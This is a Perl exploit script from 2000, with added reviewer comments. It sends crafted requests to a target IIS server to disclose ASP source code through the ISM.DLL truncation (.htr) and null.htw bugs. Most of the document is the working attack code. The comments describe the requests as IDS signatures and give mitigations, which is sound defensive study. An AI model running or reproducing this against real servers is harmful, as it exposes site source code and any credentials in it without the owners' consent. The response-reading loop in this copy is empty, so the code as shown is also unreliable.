#----------------------------------------------------------------#
# [ISMyASP]                                                      #
# IIS ASP source code viewer using ISM.DLL buffer truncation bug #
# and null.htw bug                                               #
# LoWNOISE Colombia 5/2000                                       #
# Efrain 'ET' Torres et@cyberspace.org                           #
#----------------------------------------------------------------#
# Shoutz 2 f4lc0n & M43ztr0 <-- a gnu memb.                      #
#----------------------------------------------------------------#
# Some f() from wwwboard.pl by S.Sparling                        #
#----------------------------------------------------------------#
#
# Review notes
# ------------
# Purpose: takes one URL on the command line and sends two HTTP/1.0
# GET requests for its path to port 80 of its host, printing each
# request before it is sent.
#
# Request shapes, as built below (useful as log / IDS signatures):
#   1. "GET <path>" + 230 repetitions of "%20" + ".htr HTTP/1.0"
#   2. "GET /null.htw?CiWebHitsFile=<path>%20&CiRestriction=none
#       &CiHiliteType=Full HTTP/1.0"
# Both requests end in bare "\n\n" rather than CRLF pairs and carry
# no Host or other header lines.
#
# Mitigation: apply the vendor's fixes for both issues and unmap the
# .htr and .htw handlers on servers that do not need them. The author
# points to Cerberus advisory CISADV000327 for the first issue.
#
# Code state: no "use strict" / "use warnings"; every variable is a
# package global, which is how post_message sees $remote, $port and
# $submit; the socket is a bareword handle (SOCK).

use Socket;    # supplies inet_aton, sockaddr_in, PF_INET, SOCK_STREAM

# Fixed destination port; a port written in the URL is not parsed out.
$port=80;

# Usage banner when no argument is given.
if (!($ARGV[0])) {
    print "\n[ISMyASP]\n";
    print "$0 http://host/view.asp \n";
    print "ET LoWNOISE Colombia.\n";
    exit;
}

$url=$ARGV[0];
chop($url) if $url =~ /\n$/;    # drop a trailing newline if present
print "url: $url\n";

# Host = URL minus the "http://" prefix and minus everything from the
# first "/" on (the class [^>] means a ">" would stop that match).
$remote = $url;
$remote =~ s/http\:\/\///g;
$remote =~ s/\/([^>]|\n)*//g;
print "host: $remote\n";

# Path = URL minus the "http://" prefix and minus the host text.
# NOTE(review): $remote is interpolated as an unescaped pattern with /g,
# so "." in the host matches any character and any later occurrence of
# the host text inside the path is removed as well.
$path = $url;
$path =~ s/http\:\/\///g;
$path =~ s/$remote//g;
print "path: $path\n";

$spaces=230; #THIS IS THE DEFAULT VALUE FOR ISM.DLL b.t
#REMEMBER THIS ATTACK ONLY WORKS ONLY 1 TIME
#READ THE CERBERUS CISADV000327.

# Request 1: the path padded with $spaces "%20" sequences, then ".htr".
$submit = "GET $path";
$i=0;
while($i < $spaces) {
    $submit= "$submit%20";
    $i++;
}
$submit= "$submit.htr HTTP/1.0\n\n";
print "======Trying ism.dll buffer truncation...\n";
print "submit: $submit\n\n";
&post_message;    # "&name;" form: called before its definition, shares @_

# Request 2: null.htw with the path (plus a trailing "%20") passed as
# CiWebHitsFile and CiHiliteType=Full.
print "======Trying null.htw...\n";
$submit="GET /null.htw?CiWebHitsFile=$path%20&CiRestriction=none&CiHiliteType=Full HTTP/1.0\n\n";
print "submit: $submit\n\n";
&post_message;

# post_message: opens a TCP connection to $remote:$port, sends the
# current contents of $submit, then is meant to print the reply.
# Takes no arguments; reads the globals $port, $remote and $submit and
# sets $iaddr, $paddr and $proto. Dies if the port, host lookup, socket
# or connect step fails.
sub post_message {
    # A non-numeric $port is treated as a service name and looked up.
    if ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); }
    die("No port specified.") unless $port;
    $iaddr = inet_aton($remote) || die("Failed to find host: $remote");
    $paddr = sockaddr_in($port, $iaddr);
    $proto = getprotobyname('tcp');
    socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket: $!");
    connect(SOCK, $paddr) || die("Unable to connect: $!");
    send(SOCK,$submit,0);    # return value is not checked
    printf "\n======Waiting for reply [pray]....\n\n";
    # NOTE(review): the loop condition is empty in this copy, so nothing
    # is read from SOCK here. The read expression was presumably lost
    # when the page was converted from HTML -- confirm against another
    # copy of the file.
    while() { print $_; }
    close(SOCK);
}

# Runs after the second post_message call returns. The string literal
# contains a raw line break, kept exactly as it appears in this copy.
print "\n\n======THE END. 
[LoWNOISE]\n";
exit; #:) narco.guerrilla&gov.sucks.co (huge :x to PO-K)